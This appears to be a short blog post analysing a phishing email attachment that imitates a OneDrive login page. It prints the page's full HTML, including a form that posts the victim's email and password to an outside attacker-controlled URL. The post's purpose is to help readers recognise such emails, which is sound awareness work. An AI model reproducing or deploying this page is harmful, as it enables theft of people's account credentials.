Phishing E-mails

If you know anything about the internet and some of the little tricks that hackers use to gain access to your personal accounts then I’m sure you have heard of the term “Phishing“. If you haven’t then I suggest you read up on this article because I’m not going to go into great detail explaining what it is in this post.

What I will do today is share with you guys a little trick that I’ve seen¬†“hackers” (if you can even call it hacking) using lately to trick users into handing over their password.

In this example somebody at work got this e-mail with an attachment named “PI Order.html” and asked me if it’s safe to open. After I carefully examined the .html code of the page i discovered it’s Login form that is attempting to look like OneDrive and when somebody enters their login credentials for one drive it sends that information back to the “hacker” so they can login and steal your account. Aka this is a act of Phishing.

This is what the e-mail looked like in the user’s inbox:

phishing_onedrive

Here is the code of the fake website.

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”>
<html><head>
<link rel=”icon” href=”images/favicon.ico” type=”image/gif” sizes=”16×16″>
<meta content=”text/html; charset=UTF-8″ http-equiv=”content-type”>
<title>onedrive</title>

<script>
function validateForm() {
var x = document.forms[“onedrive”][“email”].value;
var atpos = x.indexOf(“@”);
var dotpos = x.lastIndexOf(“.”);
if (atpos<1 || dotpos<atpos+2 || dotpos+2>=x.length) {
alert(“Enter a valid email address”);
return false;
}
}
</script>
</head><body>
<div style=”text-align: center;”><img style=”width: 111px; height: 40px;” alt=”” src=”images/OneDriveLogoDark3.png”><br>
<form method=”post” action=”http://www.jerkyfaq.com/wp-content/uploads/mogin.php” name=”onedrive” onsubmit=”return validateForm()”><font style=”color: rgb(153, 153, 153);” size=”+3″><span style=”font-weight: bold;”>One place for everything in your life<br>
<small><small><small><small>Easily store and share photos, videos,
documents and more…<br>
<br>
Please Login with your email and password to view your document.<br>
<br>
<br>
<input size=”50″ name=”email” placeholder=”Enter your email address”><br>
<br>
<input size=”25″ name=”pass” placeholder=”Enter your password” type=”password”><br>
<br>
<input value=”Login to view document” type=”submit”></small></small></small></small></span></font></form>
</div>

<font style=”color: rgb(153, 153, 153);” size=”+3″><small><small><small><small><br>
</small></small></small></small></font>
<div style=”text-align: center;”><font style=”color: rgb(153, 153, 153);” size=”+3″><small><small><small><small><img style=”width: 478px; height: 277px;” alt=”” src=”images/static-banner.png”><br>
<img style=”width: 1000px; height: 4px;” alt=”” src=”images/flyingdots.gif”><br>
</small></small></small></small></font></div>

<font style=”color: rgb(153, 153, 153);” size=”+3″><small><small><small><small><br>
</small></small></small></small></font>
<div style=”text-align: center;”><font style=”color: rgb(153, 153, 153);” size=”+3″><small><small><small><small>Microsoft</small></small></small></small></font><br>
</div>

<br>

<br>

</body></html>

And this is what the page looked liked when opened.

phishing_onedrive2

Conclusion

As you can see this is a very poor attempt by the “hacker” to fake the login page for OneDrive but I give them Kudos for at least trying I guess. At least now my readers know what to look out for if they see similar e-mails in their inbox.

Maybe next time the “hackers” will actually make sure the images are linked correctly to an actual online image vs a local image that wasn’t included in the e-mail.

One comment

Leave a Reply

Your email address will not be published. Required fields are marked *